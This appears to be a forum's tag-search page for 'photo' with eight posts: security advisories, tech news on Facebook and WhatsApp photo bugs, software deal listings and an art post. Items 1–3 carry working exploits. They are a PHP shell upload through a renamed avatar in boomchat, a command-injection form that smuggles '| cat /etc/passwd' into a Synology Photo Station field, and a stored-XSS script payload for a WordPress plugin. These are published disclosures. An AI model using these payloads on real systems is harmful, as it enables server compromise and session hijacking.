Showing results for tags 'photo'.

Found 8 results

  1. # Title : boomchat-v4.2 Upload Vulnerability
     # Author : indoushka
     # email : indoushka4ever@gmail.com
     # Dork : no 4 noob
     # Tested on: Win8 fr pro
     # Bug : Upload
     # Download : www.20script.ir
     =======================================
     1- register in script 4 chat
     2- change photo of profile
     3- change evil from 1.php to 1.php.jpg
     4- go to http://127.0.0.1/bmchat/avatar/peter85467529.php

     Source
  2. ------------------------------------------------------------------------
     Command injection vulnerability in Synology Photo Station
     ------------------------------------------------------------------------
     Han Sahin, May 2015

     ------------------------------------------------------------------------
     Abstract
     ------------------------------------------------------------------------
     A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS.

     ------------------------------------------------------------------------
     Tested version
     ------------------------------------------------------------------------
     This issue was tested on Synology Photo Station version 6.2-2858.

     ------------------------------------------------------------------------
     Fix
     ------------------------------------------------------------------------
     Synology reports that this issue has been resolved in Photo Station version 6.3-2945.
     https://www.synology.com/en-us/releaseNote/PhotoStation

     ------------------------------------------------------------------------
     Details
     ------------------------------------------------------------------------
     https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html

     Proof of concept

     The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt.

     <html>
       <body>
         <form action="http://<target>/photo/webapi/photo.php" method="POST">
           <input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" />
           <input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " />
           <input type="hidden" name="api" value="SYNO.PhotoStation.Photo" />
           <input type="hidden" name="method" value="edit" />
           <input type="hidden" name="version" value="1" />
           <input type="hidden" name="ps_username" value="admin" />
           <input type="hidden" name="" value="" />
           <input type="submit" value="Submit request" />
         </form>
       </body>
     </html>

     Source: http://dl.packetstormsecurity.net/1505-exploits/synologyphotostation-exec.txt
  3. Advisory ID: HTB23257
     Product: WP Photo Album Plus WordPress Plugin
     Vendor: J.N. Breetvelt
     Vulnerable Version(s): 6.1.2 and probably prior
     Tested Version: 6.1.2
     Advisory Publication: April 29, 2015 [without technical details]
     Vendor Notification: April 29, 2015
     Vendor Patch: April 29, 2015
     Public Disclosure: May 20, 2015
     Vulnerability Type: Cross-Site Scripting [CWE-79]
     CVE Reference: CVE-2015-3647
     Risk Level: Medium
     CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
     Solution Status: Fixed by Vendor
     Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

     -----------------------------------------------------------------------------------------------

     Advisory Details:

     High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable website.

     The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in administrator’s browser in context of the vulnerable website, when administrator views images or comments in administrative interface.

     A simple exploit below will store JS code in the WP database and display a JS popup window with "ImmuniWeb" word every time the administrator views comments or images:

     <form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main">
       <input type="hidden" name="action" value='wppa'>
       <input type="hidden" name="wppa-action" value='do-comment'>
       <input type="hidden" name="photo-id" value='2'>
       <input type="hidden" name="comment" value='1'>
       <input type="hidden" name="moccur" value='1'>
       <input type="hidden" name="comemail" value='"><script>alert(/ImmuniWeb/);</script>'>
       <input type="hidden" name="comname" value='"><script>alert(/ImmuniWeb/);</script>'>
       <input type="submit" id="btn">
     </form>

     The code will be automatically executed, when the administrator visits one of the following pages:

     http://[host]/wp-admin/admin.php?page=wppa_manage_comments
     http://[host]/wp-admin/admin.php?page=wppa_moderate_photos

     -----------------------------------------------------------------------------------------------

     Solution:

     Update to WP Photo Album Plus 6.1.3

     More Information:
     https://wordpress.org/plugins/wp-photo-album-plus/changelog/

     -----------------------------------------------------------------------------------------------

     References:

     [1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin.
     [2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site.
     [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
     [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
     [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

     -----------------------------------------------------------------------------------------------

     Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

     Source: http://dl.packetstormsecurity.net/1505-exploits/wpphotoalbumplus612-xss.txt
  4. If you have enabled the automatic Facebook Photo Sync feature on your iPhone, iPad or Android devices, then beware! Hackers can steal your personal photographs without your knowledge.

     In 2012, the social network giant introduced the Facebook Photo Sync feature for iPhone, iPad and Android devices which, if opted in, allows Facebook to automatically sync all the photos saved on your mobile device with your Facebook account. The photos that you have synced from your phone are automatically uploaded in the background to a private Facebook album, which is not visible to any of your Facebook friends or other Facebook users. However, you may then choose to share photos from the album on your Facebook timeline or send them as a message to a friend.

     A bug bounty hunter, Laxman Muthiyah, discovered a critical flaw in the Facebook Photo Sync feature and Facebook API that could allow any third-party app to access your personal photos from the hidden Facebook Photo Sync album. It's something that reminds me of "The Fappenings" and "The Snappening" -- in which nude and personal photographs of top celebrities were leaked due to a security flaw in Apple's iCloud file storage service and an unofficial Snapchat messaging service app, respectively.

     In a blog post published today, Laxman explained that the vulnerability resides in the privilege mechanism that determines which applications are allowed to access synced photos using the vaultimages API. Technically, the synced private photo album should be accessible only by Facebook's official app, but the vulnerability allows any 3rd party app to get permission to read your personal synced photos. Laxman previously disclosed a vulnerability in the Facebook Graph API mechanism that allowed him to delete any photo album on Facebook owned by any user, any page or any group.

     HOW TO DISABLE AUTO-SYNC

     Though Facebook has patched the vulnerability reported by Laxman and rewarded him with $10,000 under its bug bounty program, Facebook users are advised to turn off the Facebook Photo Sync feature just to be on the safer side. In order to do so, just go to the Facebook mobile app menu, scroll down and select Account > App Settings > Sync Photos, then choose 'Don't sync my photos.'

     Source
  5. Product Description

     The top 1 watermark software, providing professional image protection solutions for your online photos.

     How Do You Know that Your Photos Are Secure?
     If you are sharing your photos on the internet, you are at risk of losing them. Someone could take the photos for their own use, or maliciously revise them, and you might never even know. Watermark Software is a professional watermarking program for protecting the copyright of online photos. It can add a text watermark, image watermark, logo and signature to photos to prevent unauthorized use. Watermark Software also supports batch mode, and adding a watermark to 500 pictures takes less than 1 minute.

     Text Watermark
     A common way to protect images by adding your name, nickname, signature or date to a photo.

     Image Watermark
     Allows you to add an image to prevent others from removing the watermark and stealing the photo. There are a lot of free watermarks.

     Pretty Frames
     Watermark Software provides many picture frames that you can add and edit to retouch your photo at will.

     Make QR Code as Watermark
     A QR code is a square black pattern like a barcode which contains encoded information and can be scanned to read that information. Watermark Software allows you to put a QR code as a watermark on your photo to show more extended information.

     EXIF Editor
     It's an invisible watermark embedded in your image file, also a strong proof of copyright.

     Watermark tiling for strong protection
     For some special purposes, you need to protect your shared photos to avoid copying and unauthorized use. However, we can't prevent reproduction and dissemination on the internet. A tiled watermark provides strong protection for your photo display.

     Photo Resize
     Two modes, Pixel and Percentage, for various photo sizes; optimizes the quality automatically.

     Batch Rename
     A powerful template lets you rename hundreds of files immediately.

     Photo Cropping
     Remove unwanted areas of a photo, enlarge the important area of the photo and make your photo smaller than the original.

     Support All of Photo Formats
     Add photos with different formats to Watermark Software and it will process them at once.

     Amazing Batch Process Speed – Faster Than Ever
     Still wasting a whole day to add watermarks to batches of photos? Get free again with Watermark Software!
     - High Efficiency – Batch Watermark / Batch Resize / Batch Rename / Batch Editing and more;
     - Top speed – Watermark all your travel, party photos in one operation, batch watermark over 300 photos within 1 minute;
     - Smart fit – Intelligently adjust the watermark's size/place to fit different size/format pictures;

     Create Customized Templates for Fast Watermarking
     We are tired of doing the same thing repeatedly! Your own custom watermark style can be saved as a template on your computer; just load the template to restore your watermark project. No need to waste your precious time doing it again.

     Exclusive Feature – Upload all of the processed images to your web server automatically via FTP.

     Simplify your job – If you want to add a watermark to 500 photos for your website/blog/online storage, just run Watermark Software and then enjoy a cup of coffee; everything will be done when you get back.

     Product Homepage Here
     -> Download <-
     Deal Expires in: EXPIRED!
  6. Product Description

     40% Discount on Zoner Photo Studio 16 Pro! Best graphic software 2014.

     What’s new in Zoner Photo Studio 16?

     Now with Touch Control
     Zoner Photo Studio is the first free photo edit software with Touch Controls. Find, edit, show and share images faster than ever. Bring those same Touch Control motions that you use on your smartphone and tablet to your PC!
     - Cycle through photos with just a flick of the finger
     - Zoom in and out using pinch actions
     - Select desired files or retouch options with a single tap

     Editing—Faster and Easier Than Ever
     What You Want In One Place
     Stop spending time hunting through pull-down edit option bars to locate what you want. The Editor now displays all functions in a Quick Edits pane on the right hand side of the workspace. Easy-to-use sliders deliver instant results.

     Geotag Photos to Maps
     See Where You’ve Been
     Click on a photo, drag it to a map, and Zoner Photo Studio creates a virtual pushpin that automatically adds a Geotag to the file and places it on the map. Have a camera that already Geotags your photos? Those tags will be visible when you import them into Zoner Photo Studio. Geotags also display in Zonerama album photos.

     Content-Aware Resizing
     Intelligent Photo Composition
     Wish to change a photo’s composition or size without shrinking or cropping key elements? New for version 16 is Content-Aware resizing and the ability to adjust only areas you designate. Use to:
     - bring two people side-by-side
     - make narrow an object that’s too wide
     - improve overall balance and proportion

     Automatic Facebook Sharing
     From Zonerama to Social Media Sharing
     If you upload photos to both Zonerama albums and Facebook, you now have seamless integration between the two. No more uploading twice! Pick one and photos appear in both places

     IMPORT
     - Import now also allows moving files from camera/card instead of copying them
     - Improved detection of already-downloaded photos
     - Automatic notification when a device is newly connected

     MANAGER
     - Manager now has four modes—Browser, Preview, Map, and Compare
     - Viewer—photo viewing; quick 1:1 detail checking/easy access to zoom
     - Map—offers GPS tagging by dragging pictures onto a map; shows shot locations of all pictures in current folder
     - Compare—for visually comparing up to four photos, including synchronized panning/zooming
     - Navigator—now uses sections instead of tabs, for quicker navigation
     - RAW+JPEG—RAW+JPEG file pairs can now be grouped for easier management
     - Keywords pane—easier keyword drag and drop: onto multiple selected files, onto the Preview, onto individual pictures in Compare
     - Folder synchronization—new settings for fine-tuning synchronization and for how folder comparison results are shown
     - Background synchronization—new configurable synchronization tasks and scheduled running of these tasks in the background even when ZPS is not running
     - Catalog—new display options: Last 7 days, Last 30 days

     EDITING FILTERS
     - New Content-aware Resize—resizing of a picture that takes its contents into account and preserves the most important parts of the picture (e.g. a person) while shrinking the less important parts (e.g. the sky).
     - Editing filters are no longer windows—their settings are in the Side Panel, and they now have the same look and feel as the rest of ZPS
     - Place Text, Place Image—new watermarking option
     - Envelopes—new Frames category

     VIEWER
     - Filmstrip—now offers easy folder navigation
     - Quick 1:1 viewing and smooth zooming

     EDITOR
     - Settings for all tools and editing filters are now in the Side Panel. Everything now works and looks the same way, and settings are easier to reach.
     - Side Panel can now be placed on either the right or the left.
     - Quick Filters—new filters and frames
     - New “Place Line” tool—for quickly drawing lines onto pictures
     - Place Image, Place Text, etc. tools—previews for saved layer-effect settings (e.g. shadow, outline, etc.) and quick application of these effects
     - Place Shape tool now offers previews of shapes
     - Filmstrip—now offers easy navigation of folders

     RAW
     - Pictures are shown and refreshed more quickly, at better quality, and with lower memory demands.

     GENERAL
     - Improved support for devices with touch controls
     - Improved display support for high-DPI display devices
     - Hardware acceleration for display of previews in Preview mode and in the Viewer—smoother display and zooming
     - GPU acceleration—two more operations can now be accelerated: rotation and horizon leveling
     - Other interface improvements

     -> Download <-
     Deal Expires in: EXPIRED!
     Click Here to Get 45% Discount Coupon on Zoner Photo Studio 17 Pro
  7. Last week, the most popular mobile messaging application WhatsApp finally arrived on the web — dubbed WhatsApp Web, but unfortunately it needs some improvements in its web version.

     An independent 17-year-old security researcher, Indrajeet Bhuyan, reported two security holes in the WhatsApp web client that in some way expose its users’ privacy. Bhuyan called the first hole the WhatsApp photo privacy bug and the other the WhatsApp Web Photo Sync Bug.

     Bhuyan is the same security researcher who reported to us the vulnerability in the widely popular mobile messaging app which allowed anyone to remotely crash WhatsApp by sending a specially crafted message of just 2kb in size, resulting in the loss of conversations.

     WhatsApp Photo Privacy Bug

     According to him, the new version of WhatsApp Web allows us to view a user’s profile image even if we are not on the contact list of that user. Even if the user has set the profile image privacy setting to "Contacts Only," the profile picture can be viewed by people outside the contact list as well.

     Basically, if we set the profile image privacy to Contacts Only, only the people in our contact list are able to view our profile picture, and nobody else. But this is not the case with WhatsApp Web. You can watch how this works in the video demonstration below:

     WhatsApp Web Photo Sync Bug

     The second security hole concerns the WhatsApp Web Photo Syncing functionality. Bhuyan noticed that whenever a user deletes a photo that was sent via the mobile version of the WhatsApp application, the photo appears blurred and can’t be viewed. However, the same photo, which has already been deleted by the user from the mobile WhatsApp version, can still be accessed via WhatsApp Web, as the photo does not get deleted from its web client, revealing the fact that the mobile and web clients of the service are not synced properly. You can watch the video demonstration of this as well:

     This is no surprise, as WhatsApp Web was introduced just a couple of days ago and these small security and implementation flaws could be expected at this time, and some other bugs could also be revealed in the near future. However, the company will surely fix the issues and will definitely make its users’ messaging experience secure.

     Having partnered with Open Whisper Systems, WhatsApp recently made end-to-end encryption a default feature on the Android platform, stepping a way forward for the online privacy of its users around the world.

     -> Source: 17-Year-Old Found Bugs in WhatsApp Web and Mobile App - Hacker News
  8. Hello. Here are some of my creations. Wait until it loads. The animations run in slow motion because there are many of them. The works are made in Photoshop and After Effects. Excuse the double post. There is a limit on images per post.